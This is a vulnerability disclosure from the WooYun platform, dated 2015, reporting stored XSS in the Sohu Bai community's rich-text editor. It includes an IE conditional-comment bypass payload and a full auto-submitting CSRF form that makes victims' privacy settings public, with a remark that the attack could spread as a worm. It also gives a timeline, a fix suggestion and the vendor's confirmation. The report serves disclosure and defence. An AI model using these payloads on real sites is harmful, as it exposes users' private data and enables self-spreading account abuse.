当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093358

漏洞标题:搜狐白社区富文本XSS

相关厂商:搜狐

漏洞作者: Kieran

提交时间:2015-01-22 17:18

修复时间:2015-03-08 17:20

公开时间:2015-03-08 17:20

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-22: 细节已通知厂商并且等待厂商处理中
2015-01-22: 厂商已经确认,细节仅向厂商公开
2015-02-01: 细节向核心白帽子及相关领域专家公开
2015-02-11: 细节向普通白帽子公开
2015-02-21: 细节向实习白帽子公开
2015-03-08: 细节向公众公开

简要描述:

编辑器允许编辑HTML哎!
试试绕过吧~

详细说明:

啦啦啦

漏洞证明:

域名:bai.sohu.com
写篇日志看看~
咦 可以编辑 HTML 哎~~~
切换到HTML模式
写入

<!--[if IE]>
<img src=x onerror=alert()>
<![endif]-->


成功在 IE 下弹窗!

142338.png


假如插入[if !IE]会被过滤掉 暂时利用条件是所有版本的 IE
但是又发现自定义的 <script>无效
外部引入的js也无效
但是没关系
可以构造表单进行 XSRF
表单是有效的

<form method="POST" name="form0" action="http://bai.sohu.com:80/privacy/base.do">
<input type="hidden" name="id_1" value="0"/>
<input type="hidden" name="level_1" value="-3"/>
<input type="hidden" name="id_2" value="0"/>
<input type="hidden" name="level_2" value="-3"/>
<input type="hidden" name="id_3" value="0"/>
<input type="hidden" name="level_3" value="-3"/>
<input type="hidden" name="id_4" value="0"/>
<input type="hidden" name="level_4" value="-3"/>
<input type="hidden" name="id_5" value="0"/>
<input type="hidden" name="level_5" value="-3"/>
<input type="hidden" name="id_6" value="0"/>
<input type="hidden" name="level_6" value="-3"/>
<input type="hidden" name="id_7" value="0"/>
<input type="hidden" name="level_7" value="-3"/>
<input type="hidden" name="id_8" value="0"/>
<input type="hidden" name="level_8" value="-3"/>
<input type="hidden" name="id_9" value="0"/>
<input type="hidden" name="level_9" value="-3"/>
<input type="hidden" name="id_10" value="0"/>
<input type="hidden" name="level_10" value="-3"/>
<input type="hidden" name="id_11" value="0"/>
<input type="hidden" name="level_11" value="-3"/>
<input type="hidden" name="id_12" value="0"/>
<input type="hidden" name="level_12" value="-3"/>
<input type="hidden" name="id_13" value="0"/>
<input type="hidden" name="level_13" value="-3"/>
<input type="hidden" name="cuslevel_13" value=""/>
<input type="hidden" name="pu_13" value=""/>
<input type="hidden" name="pg_13" value=""/>
<input type="hidden" name="bu_13" value=""/>
<input type="hidden" name="bg_13" value=""/>
<input type="hidden" name="id_14" value="0"/>
<input type="hidden" name="level_14" value="-3"/>
<input type="hidden" name="cuslevel_14" value=""/>
<input type="hidden" name="pu_14" value=""/>
<input type="hidden" name="pg_14" value=""/>
<input type="hidden" name="bu_14" value=""/>
<input type="hidden" name="bg_14" value=""/>
<input type="hidden" name="id_15" value="0"/>
<input type="hidden" name="level_15" value="-3"/>
<input type="hidden" name="cuslevel_15" value=""/>
<input type="hidden" name="pu_15" value=""/>
<input type="hidden" name="pg_15" value=""/>
<input type="hidden" name="bu_15" value=""/>
<input type="hidden" name="bg_15" value=""/>
<input type="hidden" name="id_16" value="0"/>
<input type="hidden" name="level_16" value="-3"/>
<input type="hidden" name="cuslevel_16" value=""/>
<input type="hidden" name="pu_16" value=""/>
<input type="hidden" name="pg_16" value=""/>
<input type="hidden" name="bu_16" value=""/>
<input type="hidden" name="bg_16" value=""/>
<input type="hidden" name="id_17" value="0"/>
<input type="hidden" name="level_17" value="-3"/>
<input type="hidden" name="cuslevel_17" value=""/>
<input type="hidden" name="pu_17" value=""/>
<input type="hidden" name="pg_17" value=""/>
<input type="hidden" name="bu_17" value=""/>
<input type="hidden" name="bg_17" value=""/>
<input type="hidden" name="id_18" value="0"/>
<input type="hidden" name="level_18" value="-3"/>
<input type="hidden" name="cuslevel_18" value=""/>
<input type="hidden" name="pu_18" value=""/>
<input type="hidden" name="pg_18" value=""/>
<input type="hidden" name="bu_18" value=""/>
<input type="hidden" name="bg_18" value=""/>
</form>
<img src=x onerror=form.submit()>


上面这段代码会把隐私设置里的个人档案权限全部公开,默认是不公开的

QQ截图20150122143031.png


还可以伪造用户发一篇和我们一模一样的日志,蠕虫雏形?

修复方案:

过滤注释
或者干脆取消自定义html 更方便?

版权声明:转载请注明来源 Kieran@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-01-22 18:07

厂商回复:

感谢支持。

最新状态:

暂无